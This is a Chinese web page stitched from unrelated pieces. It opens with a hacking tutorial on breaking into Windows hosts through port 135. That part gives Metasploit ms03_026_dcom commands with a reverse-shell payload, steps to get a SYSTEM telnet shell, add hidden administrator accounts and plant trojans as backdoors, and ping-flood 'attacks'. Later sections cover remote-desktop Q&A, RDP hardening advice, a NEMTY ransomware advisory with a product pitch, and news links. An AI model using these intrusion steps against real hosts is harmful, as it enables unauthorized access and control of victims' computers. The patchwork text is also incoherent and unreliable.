知道IP和端口,怎样最简单的入侵到远程主机

知道IP和端口,怎样最简单的入侵到远程主机,第1张

 通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)

  协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;

  使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。

  下面我就来介绍一下通过135端口入侵的方法。

  (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。

  (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。

  (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v25。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。

  下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v25就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。

简单的nmap攻击(默认服务器开启135端口)先用上述nmap扫描目标主机信息,然后进入命令

msfconsole

search ms03-026-dcom

use exploit/windows/dcerpc/ms03_026_dcom/

set PAYLOAD windows/meterpreter/reverse_tcp(选择工具)

set RHOST 192168110 //目标主机

set LHOST 192168111 //操作主机

exploit 执行命令

shell 得到目标shell,基本可以为所欲为了

一、ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping / 回车。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。 -t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 -l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。 -n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。 说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如"ping IP -t -n 3",虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的 IP。 下面我们举个例子来说明一下具体用法。 这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被 ping主机的操作系统,之所以说"初步判断"是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。 (小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix) 至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。 二、nbtstat 该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。 -a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。 -A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。 -n 列出本地机器的NETBIOS信息。 当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。 三、netstat 这是一个用来查看网络状态的命令,操作简便功能强大。 -a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息。 这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。 -r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。

四、tracert 跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。 这里说明数据从本地机器传输到19216801的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。 2

必须掌握的八个cmd命令(自己的收藏)

  五、net 这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是 微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /回车。 在这里,我们重点掌握几个入侵常用的子命令。 net view 使用此命令查看远程主机的所以共享资源。命令格式为net view IP。 net use 把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: IPsharename。上面一个表示把 19216805IP的共享名为magic的目录影射为本地的Z盘。下面表示和19216807建立IPC$连接(net use IP IPC$"password" /user:"name")。 建立了IPC$连接后,呵呵,就可以上传文件了:copy ncexe 9216807admin$,表示把本地目录下的ncexe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。 net start 使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,成功启动了telnet服务。 net stop 入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。 net user 查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。 1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。 2,net user abcd /del,将用户名为abcd的用户删除。 3,net user abcd /active:no,将用户名为abcd的用户禁用。 4,net user abcd /active:yes,激活用户名为abcd的用户。 5,net user abcd,查看用户名为abcd的用户的情况。 net localgroup 查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法: net localgroup groupname username /add。 现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用 net user abcd来查看他的状态。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。 net time 这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time IP。 3 必须掌握的八个cmd命令(自己的收藏)

  六、at 这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command computer。 表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。 七、ftp 大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放 ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。 首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入"help"来查看帮助(任何DOS命令都可以使用此方法查看其帮助)。 大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。 首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入"open 主机IP ftp端口"回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。 用户名和密码都是ftp,密码是不显示的。当提示 logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。 接下来就要介绍具体命令的使用方法了。 dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。 cd 进入某个文件夹。 get 下载文件到本地机器。 put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。 delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。 bye 退出当前连接。 quit 同上。 八、telnet 功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以 administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。 然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。 当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了。

怎么远程登陆服务器操作?

上面那些人说的都是错的

自己找书来看看吧

另外,楼上连题目都没看清楚

人家是说在两个地方的内网,按弗的方法怎么可能能访问到。比方,我在北京大学的校园网IP是10。46。193。25

你在广州市 的内部网,内网IP是192。168。1。2

按楼上说的,怎么可能能访问。

怎样远程进入网站服务器?

如果托管的主机是windows操作系统利用3棱89远程可以登录 登录工具是自带的,可以在程序---附件中有个远程连接,填写IP地址和端口号登录 当然这需要是你自己的主机。如果不是,托管商会给你个FTP账号,你可以上传代码如果是linux操作系统,可以用ssh登录

如何在远程桌面服务器上打开任务管理器?

不关掉这个远程的情况下,再连接一个,应该可以直接进入系统

怎样连接远程服务器,但是本地访问

1 打开开始里的附件-远程桌面连接。

2 点击选项选择本地资源选项卡。

3 点击详细信息展开将会看到驱动器的多选框。

4 选择你需要勾选的驱动器,点击确定,然后选择常规在计算机一栏中输入你想要远程的主机IP地址。

5 点击连接讲出现一个提示框如下图所示,显示可以操作本地资源,请注意安全,继续点击连接。

6 现在远程成功后就可以操作本地磁盘里的文件。

分享

服务器如何开远程?

在我的电脑右键-属性-远程里勾选 允许用户远程连接到此计算机,然后在防火墙上开启3389端口,一般是在本地连接右键-属性-高级-设置里面开启例外的,当然你把防火墙关了也可以,但不建议这样做,最后就是在路由上开启3389的远程到你这台内网的服务器,当然,如果你的服务器是直连外网就不用做这一步了,还有就是你用来做远程的用户必须设置密码,不然对方就算连进来了,也无法进入服务器,希望我的回答对你有帮助。

远程服务器的网络被我禁止了,现在无法打开远程服务器,怎样处理才能打开呢?

这个需要本地操作的,两个办法 ,一就是IPMI 远程解决 二就是 叫机房同事解决

win7的telnet远程服务如何开启?

win7下默认是禁用telnet服务的

重新启动Telnet方法如下:

1、如果你直接到控制面板的管理工具里的服务项里去找telnet的话,那是徒劳无功

的,因为默认根本就没有这一服务。当然,你可以通过如下方式搞定。“控制面

板” 一〉“程序” 一〉“打开或关闭windows功能”,在里面你可以看到许多服务项,选

择“telnet服务器”和“telnet客户端”确定即可。哗样你再回“服务项”或者

servicesmsc里面就可以看到telnet啦,

2、通过“控制面板”--〉“管理工具”一〉“服务”或者“servicesmsc进入服务项列表

之后,找到telnet,可以看到它是被禁用的,此时你需要在“禁用”右键选择“属

性”并在里面将“禁用”改为“手动”,然后再启动状态栏右键选择“启动”。这样

你机器的telnet服务就启动啦。

   凭借无与伦比的安全优势,Windows Server 2008系统让不少朋友在不知不觉中加入了使用行列。不过,这并不意味着Windows Server 2008系统的安全性就能让人高枕无忧了;这不,当我们开启了该系统自带的远程桌面功能后,Windows Server 2008系统的安全问题随即就凸显出来了,如果我们不对远程桌面功能进行合适设置,那么Windows Server 2008服务器系统受到非法攻击的可能性就会加大。为了让Windows Server 2008系统更安全,本文特意总结几则远程桌面功能的安全设置技巧,希望大家能从中获得启发!  强迫执行网络级身份验证 尽管传统操作系统也具有远程桌面功能,不过Windows Server 2008系统对远程桌面功能的安全性能进行了强化,它允许网络管理员通过合适设置来强迫远程桌面连接用户执行网络级身份验证,以防止一些非法用户也趁机使 用远程桌面功能来入侵Windows Server 2008服务器系统。要实现强迫远程桌面连接用户执行网络级身份验证操作时,我们必须按照如下步骤来设置Windows Server 2008系统的远程桌面连接参数:

首先以超级用户的身份登录进入Windows Server 2008服务器系统,打开对应系统的“开始”菜单,从中依次选择“程序”、“管理工具”、“服务器管理器”选项,打开本地服务器系统的服务器管理器控制台窗口;  其次将鼠标定位于服务器管理器控制台窗口左侧显示区域中的“服务器管理”节点选项上,在对应“服务器管理”节点选项的右侧显示区域,单击“服务器摘要”设置区域中的“配置远程桌面”链接,打开服务器系统远程桌面功能的设置对话框;

在该设置对话框的“远程桌面”处,服务器系统共为我们提供了三个设置选项,如果我们想让局域网中的任何一台普通计算机都能顺利使用远程桌面连接来远程控 制Windows Server 2008服务器系统时,那应该将“允许运行任意版本远程桌面的计算机连接”功能选项选中,当然这种功能选项容易对Windows Server 2008服务器系统的运行安全性带来麻烦。

为了让我们能够安全地使用远程桌面功能来远程控制服务器,Windows Server 2008系统推出了“只允许运行带网络级身份验证的远程桌面的计算机连接”这一控制选项(如图1所示),我们只要将该控制选项选中,再单击“确定”按钮保 存好设置操作,日后Windows Server 2008系统就会自动强制对任何一位远程桌面连接用户执行网络级身份验证操作了,这样的话非法用户自然也就不能轻易通过远程桌面连接功能来非法攻击 Windows Server 2008服务器系统了。

只许特定用户使用远程桌面 要是开通了Windows Server 2008服务器系统的远程桌面功能,本地服务器中也就多开了一扇后门,有权限的用户能进来,没有权限的用户同样也能进来,如此一来本地服务器系统的运行安 全性自然就容易受到威胁。事实上,我们可以对Windows Server 2008服务器系统的远程桌面功能进行合适设置,让有远程管理需求的特定用户能从远程桌面这扇后门中进来,其他任何用户都不允许自由进出,那样的话 Windows Server 2008服务器系统受到非法攻击的可能性就会大大降低了;要想让特定用户使用远程桌面功能,我们可以按照如下操作来设置Windows Server 2008服务器系统:

首先打开Windows Server 2008服务器系统的“开始”菜单,从中依次选择“程序”、“管理工具”、“服务器管理器”选项,进入本地服务器系统的服务器管理器控制台窗口;

其次单击服务器管理器控制台窗口右侧区域中的“配置远程桌面”链接选项,打开服务器系统远程桌面功能的设置对话框,单击该对话框中的“选择用户”按钮,系统屏幕上将会出现如图2所示的设置窗口;

将该设置窗口中已经存在的用户账号一一选中,并单击“删除”按钮;之后,再单击“添加”按钮,在其后出现的用户账号浏览对话框中,找到有远程管理需求的 特定用户账号,并将该账号选中添加进来,再单击“确定”按钮退出设置操作,这样的话任何一位普通用户日后都不能使用远程桌面功能来对Windows Server 2008服务器系统进行远程管理了,而只有在这里设置的特定用户才有权限通过远程桌面连接访问目标服务器系统。

禁止administrator使用远程桌面 在缺省状态下,Windows Server 2008服务器系统允许administrator账号使用远程桌面功能,为了防止非法攻击者尝试使用该用户账号来攻击本地服务器系统,我们可以按照下面 的操作来禁止administrator账号通过远程桌面连接来访问Windows Server 2008服务器系统:  由于从服务器 系统中无法直接删除administrator账号,为此我们可以采用最为极端的方法,那就是将administrator账号强行禁用;禁用该用户账号 最简单的方法就是先依次单击服务器系统桌面中的“开始”/“程序”/“附件”选项,从下拉菜单中选中“命令提示符”命令,并用鼠标右键单击该命令选项,再 执行右键菜单中的“以管理员身份运行”命令,打开Windows Server 2008系统的MS-DOS工作窗口,在该窗口的命令行中执行字符串命令“net user administrator /active:no”就可以了。

不过,上面的方法往往会影响网络管理员正常管理服务器系统,为此我们还可以通过为administrator账号更名的方式,来禁止administrator使用Windows Server 2008系统的远程桌面连接:  

首先以超级用户的身份登录进入Windows Server 2008服务器系统,依次单击该系统桌面中的“开始”/“运行”命令,在弹出的系统运行对话框中,输入字符串命令“gpeditmsc”,单击“确定”按钮,打开本地服务器系统的组策略编辑控制台窗口;

其次在该控制台窗口的左侧列表区域中,将鼠标定位于“计算机配置”分支选项上,再从该分支下面依次展开“Windows设置”/“安全设置”/“本地策 略”/“安全选项”,在对应“安全选项”的右侧显示区域中,双击“帐户:重命名系统管理员”目标组策略选项,打开如图3所示的选项设置窗口,在该窗口中我 们就能将administrator的名称修改成其他人不容易猜中的账号名称,最后单击“确定”按钮就能使设置生效了。

当然,我们也可以通过将administrator账号的终端登录权限取消的方法,来达到禁止administrator使用远程桌面功能的目的;在取 消administrator账号的终端登录权限时,我们可以先按前面操作打开服务器系统的组策略编辑控制台窗口,将鼠标定位于组策略编辑控制台窗口左侧 区域中的“计算机配置”分支选项上,再从该分支下面依次展开“Windows设置”/“安全设置”/“本地策略”/“用户权限分配”子项,在对应“用户权 限分配”子项的右侧显示区域中,双击目标组策略选项“通过终端服务允许登录”,在其后弹出的窗口中将administrators账号删除掉,如此一来, 当非法用户尝试使用administrator账号远程连接Windows Server 2008服务器系统时,就会出现拒绝登录的报警提示。

只许特定计算机使用远程桌面 有的时候,为了防止局域网中的计算机病毒随意通过远程桌面连接传染给Windows Server 2008服务器系统,我们需要限定任何用户只能从局域网中特定的安全计算机上使用远程桌面功能,来远程控制目标服务器系统。为了实现只许特定计算机使用远 程桌面与Windows Server 2008服务器系统建立连接的目的,我们可以按照如下步骤来设置本地服务器系统:

首先以系统管理员权限登录进入Windows Server 2008服务器系统,依次单击“开始”/“运行”命令,打开系统运行文本框,在其中输入“gpeditmsc”字符串命令,单击“确定”按钮,打开组策略编辑控制台窗口; 其次在该控制台窗口的左侧显示区域中,将鼠标定位于“计算机配置”分支选项上,再从该分支下面依次展开“管理模板”/“网络”/“网络连接” /“Windows防火墙”/“标准配置文件”子项,找到“标准配置文件”子项下面的“Windows防火墙:允许入站远程管理例外”目标组策略项目,用 鼠标双击该项目,打开如图4所示的属性设置界面;

下面将该设置界面中的“已启用”项目选中,并且在其后自动激活的“允许来自这些IP地址的未经请求的传入消息”文本框中输入安全的特定计算机IP地址, 再单击“确定”按钮完成设置操作,这样的话任何用户日后只能从这里指定的普通计算机上使用远程桌面功能来远程控制Windows Server 2008服务器系统了。 wwwjb51net 禁止所有计算机使用远程桌面  在排查网络故障的时候,我们有时 需要临时禁止局域网中的所有计算机与Windows Server 2008服务器系统建立远程桌面连接,实现这种控制目的的方法有很多,不过最为简单的方法,就是利用服务器系统内置防火墙功能来快速禁止Windows Server 2008系统的远程桌面访问网络,下面就是具体的限制步骤:

首先打开Windows Server 2008服务器系统桌面的“开始”菜单,从中依次单击“设置”/“控制面板”选项,在弹出的系统控制面板窗口中,双击Windows防火墙选项,在其后弹 出的窗口中单击左侧区域中的“启用或关闭Windows防火墙”链接,进入Windows Server 2008系统的防火墙基本配置窗口; 接着单击基本配置窗口中的“例外”选项卡,打开如图5所示的选项设置页面,将该页面中的“远程桌面”选项取消选中,再单击“确定”按钮关闭设置页面,如 此一来局域网中的任意一台计算机再次尝试与Windows Server 2008服务器系统建立远程桌面连接时,都会被对应系统中的内置防火墙程序强行禁止掉了。

对远程桌面连接适当限制 大家知道,如果在某一段时间内同时有若干个远程桌面连接访问Windows Server 2008服务器系统时,对应服务器系统的运行效率就会受到明显影响,甚至能发生无法响应的故障现象。为了确保Windows Server 2008服务器能够稳定运行,我们可以按照下面的操作,来对远程桌面连接数量进行适当限制:

首先以超级用户身份登录进Windows Server 2008服务器系统,依次单击“开始”/“程序”/“管理工具”/“终端服务”/“终端服务配置”命令,打开对应系统的终端服务配置控制台窗口;  其次点选该控制台窗口左侧显示区域中的“授权诊断”分支选项,在对应该分支选项的右侧显示区域中,选中“RDP-Tcp”选项,并用鼠标右键单击该选项,从弹出的快捷菜单中执行“属性”命令,打开“RDP-Tcp”选项的属性设置对话框; wwwjb51net 接着单击该属性设置对话框中的“网络适配器”标签,进入如图6所示的标签设置页面,在该设置页面的最大连接数设置项处,我们可以根据服务器系统自身的硬件配置性能进行合适设置,通常将该数值限制在“10”以下,最后单击“确定”按钮就可以了。

当然,我们也可以通过修改系统注册表的方法,来对远程桌面连接数量进行适当限制;在进行这种限制操作时,我们可以依次单击“开始”/“运行”命令,在系 统运行框中执行“regedit”命令,打开服务器系统的注册表编辑界面;将鼠标定位于该注册表编辑界面左侧显示区域中的 “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services”分支选项上,在对应“Terminal Services”选项的右侧显示窗格中创建好双字节值“MaxInstanceCount”,再将该键值的数值设置成十进制的“10”,最后刷新一下系 统注册表就可以使设置生效了。

NEMTY勒索病毒被发现 可通过受损的远程桌面连接传播

时间:2019-09-06 14:59:41 来源:游侠安全网

概 况

近日,美创安全实验室发现了一种全新的勒索病毒,根据它给被加密文件额外附加的文件后缀名,它被命名为“NEMTY”。这是该类型的勒索软件的第一个版本,目前,尚不清楚NEMTY具体是通过何种渠道传播的,但从一个可靠的消息来源获悉,攻击者是通过受损的远程桌面连接(RDP)来传播该病毒的。

病毒情况

美创安全实验室第一时间拿到相关病毒样本,经 virustotal 检测,确认为 NEMTY勒索病毒。NEMTY在执行加密时,使用RSA+salsa20算法加密电脑上的重要文件。加密后,影响用户关键业务运行,且暂时无法解密。

经过分析发现,此新型勒索病毒似乎融合了之前GandCrab和Sodinokibi两款勒索病毒的一些特点,但此勒索病毒代码结构与此前两款勒索病毒都不相同。至于该勒索病毒后期会不会流行爆发,需要持续跟踪观察,请各企业做好相应的防范措施,勒索病毒的重点在于防御。

详细信息

NEMTY勒索病毒和大多数勒索病毒一样,会删除其处理的文件的卷影副本,从而使受害者无法通过windows创建的备份来恢复数据。

如果不幸中招,则存储在计算机上的所有文件都被加密。受害者将能够看到如下图所示的一张赎金票据,提示受害者如何缴纳赎金获取解密工具。

该勒索病毒要求了009981 BTC的赎金,按照目前的行情,大约价值1000美元。为了保持匿名性,支付网站被托管在Tor网络上,攻击者还“贴心”地在赎金票据中给出了Tor浏览器客户端的下载地址。除此之外,攻击者还提供了另一个带有聊天功能的网页的链接,以便指导受害者如何进行付款操作。

防护措施

美创安全实验室再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施,以尽可能避免损失:

(1)及时给电脑打补丁,修复漏洞。

(2)对重要的数据文件定期进行非本地备份。

(3)不要点击来源不明的邮件附件,不从不明网站下载软件。

(4)RDP远程服务器等连接尽量使用高强度且无规律的密码,不要使用弱密码。

(5)尽量关闭不必要的文件共享。

(6)尽量关闭不必要的端口。

以上为防护勒索病毒的常规方式,为了更好的应对已知或未知勒索病毒的威胁,美创通过对大量勒索病毒的分析,基于零信任、守白知黑原则,创造性的研究出针对勒索病毒的终端产品诺亚防勒索系统。诺亚防勒索在不关心漏洞传播方式的情况下,可防护任何已知或未知的勒索病毒。以下为诺亚防勒索针对这款勒索病毒的防护效果。

美创诺亚防勒索可通过服务端统一下发策略并更新。默认策略可保护office文档如想保护数据库文件可通过添加策略一键保护。

无诺亚防勒索防护的情况下:

在test目录下,添加以下文件,若服务器中了勒索病毒,该文件被加密,增加了nemty后缀,并且无法正常打开。

开启诺亚防勒索的情况下:

双击执行病毒文件,当勒索病毒尝试加密被保护文件,即test目录下的文件时,诺亚防勒索提出警告并拦截该行为。

查看系统上被测试的文件,可被正常打开,成功防护恶意软件对被保护文件的加密行为。

开启堡垒模式的情况下:

为保护系统全部文件,可一键开启诺亚防勒索的堡垒模式。堡垒模式主要针对亚终端,例如ATM机,ATM机的终端基本不太会更新,那么堡垒模式提供一种机制:任何开启堡垒模式之后再进入终端的可执行文件都将被阻止运行,从而实现诺亚防勒索的最强防护模式。

运行在堡垒模式下,执行该病毒,立刻被移除到隔离区,因此可阻止任何未知勒索病毒的执行。

推荐内容

windows7今日正式停止支持 腾讯安全启动守护计划

windows7今日正式停止支持 腾讯安全启动守护计划

2020-01-14

硅谷Epstein事件发酵 比尔盖茨等千亿富豪难脱干系

硅谷Epstein事件发酵 比尔盖茨等千亿富豪难脱干系

2020-01-14

苹果高管:会扫描上传到iCloud的照片 防止违法内容

苹果高管:会扫描上传到iCloud的照片 防止违法内容

2020-01-10

使用WebAssembly的网站 将其有一半是用于恶意目的

使用WebAssembly的网站 将其有一半是用于恶意目的

2020-01-09

Android漏洞曝光 导致黑客能利用设备的NFC功能

Android漏洞曝光 导致黑客能利用设备的NFC功能

2019-11-06

安恒信息上市上交所 今年营收增长率超过50%

安恒信息上市上交所 今年营收增长率超过50%

2019-11-05

格鲁吉亚遭遇大规模网络攻击 被袭击的网页被替换为前总统的照片

格鲁吉亚遭遇大规模网络攻击 被袭击的网页被替换为前总统的照片

2019-11-01

我国《密码法》表决通过 采用特定变换的方法对加密保护信息

我国《密码法》表决通过 采用特定变换的方法对加密保护信息

2019-10-31

HIS未能阻止黑客通过机器人监视住客 可使用面部识别技术解锁

HIS未能阻止黑客通过机器人监视住客 可使用面部识别技术解锁

2019-10-30

安华金和数据库安全系统与华为GaussDB完成兼容性测试 取得华为COMPATIBLE证书及徽标使用权

安华金和数据库安全系统与华为GaussDB完成兼容性测试 取得华为COMPATIBLE证书及徽标使用权

2019-10-29

sodinokibi勒索病毒攻击中韩企业 可伪装成表格文件

sodinokibi勒索病毒攻击中韩企业 可伪装成表格文件

2019-10-28

SRLabs找到Google和Amazon扬声器的漏洞 可进行网络钓鱼和窃听用户

SRLabs找到Google和Amazon扬声器的漏洞 可进行网络钓鱼和窃听用户

2019-10-25

趋势科技反威胁工具包存在漏洞 启动安全扫描就会执行恶意软件

趋势科技反威胁工具包存在漏洞 启动安全扫描就会执行恶意软件

2019-10-24

NSA将建立新的网络安全部门 主要负责外国情报和网络防御

NSA将建立新的网络安全部门 主要负责外国情报和网络防御

2019-10-23

SIMP-SRD能有效的梳理公民信息 可排查数据的安全风险

SIMP-SRD能有效的梳理公民信息 可排查数据的安全风险

2019-10-22

奇安信将品牌LOGO升级为虎符 强化攻防兼备的安全思想

奇安信将品牌LOGO升级为虎符 强化攻防兼备的安全思想

2019-10-21

HildaCrypt免费释放密钥 可帮助获得恶意加密文件的访问权限

HildaCrypt免费释放密钥 可帮助获得恶意加密文件的访问权限

2019-10-18

微软发现多个安全漏洞 涉及Microsoft Windows/Jet 数据库等

微软发现多个安全漏洞 涉及Microsoft Windows/Jet 数据库等

2019-10-17

亚信安全XDR全景发布 包含实现跨越多层联动的端点

亚信安全XDR全景发布 包含实现跨越多层联动的端点

2019-10-16

TeamViewer被爆出安全事件 用户的账号密码遭到泄露

TeamViewer被爆出安全事件 用户的账号密码遭到泄露

2019-10-15

iTerm 2漏洞已存在7年 可让攻击者在电脑执行命令

iTerm 2漏洞已存在7年 可让攻击者在电脑执行命令

2019-10-14

火狐浏览器发布6902版修复更新 文件下载变成0KB

火狐浏览器发布6902版修复更新 文件下载变成0KB

2019-10-12

谷歌修复Android的26个漏洞 包含使用Media文件获得提权的漏洞

谷歌修复Android的26个漏洞 包含使用Media文件获得提权的漏洞

2019-10-10

微软出现桌面搜索异常和虚拟机问题 搜索可能空白和虚拟机无法打开

微软出现桌面搜索异常和虚拟机问题 搜索可能空白和虚拟机无法打开

2019-10-09

安华金和曝光YOUR_LAST_CHANCE勒索病毒 可修改文件后缀导致数据库无法打开

安华金和曝光YOUR_LAST_CHANCE勒索病毒 可修改文件后缀导致数据库无法打开

2019-09-30

Forcepoint ***客户端发现提权漏洞 可执行未签名的可执行文件

Forcepoint ***客户端发现提权漏洞 可执行未签名的可执行文件

2019-09-29

Emotet被重新唤醒 使用恶意的Word文档模板

Emotet被重新唤醒 使用恶意的Word文档模板

2019-09-25

SOHO路由器和NAS设备被发现125个漏洞 可能获得shell或进入管理面板

SOHO路由器和NAS设备被发现125个漏洞 可能获得shell或进入管理面板

2019-09-24

SIM卡漏洞曝光 只要发送短信即可检索个人信息

SIM卡漏洞曝光 只要发送短信即可检索个人信息

2019-09-23

德国电子制造商发现两个新漏洞 黑客将能远程编辑和访问设备内容

德国电子制造商发现两个新漏洞 黑客将能远程编辑和访问设备内容

2019-09-19

Chrome将完善隐私沙盒 帮助向目标客户推广告

Chrome将完善隐私沙盒 帮助向目标客户推广告

2019-09-17

计算机病毒中心发布治理违法APP举措 检测出8000余款恶意样本

计算机病毒中心发布治理违法APP举措 检测出8000余款恶意样本

2019-09-16

Ouroboros勒索病毒主要通过垃圾邮件传播 加密文件会添加Lazarus扩展后缀

Ouroboros勒索病毒主要通过垃圾邮件传播 加密文件会添加Lazarus扩展后缀

2019-09-12

语音生成AI软件被利用来欺诈 Pindrop欺诈案件曾增加350%

语音生成AI软件被利用来欺诈 Pindrop欺诈案件曾增加350%

2019-09-11

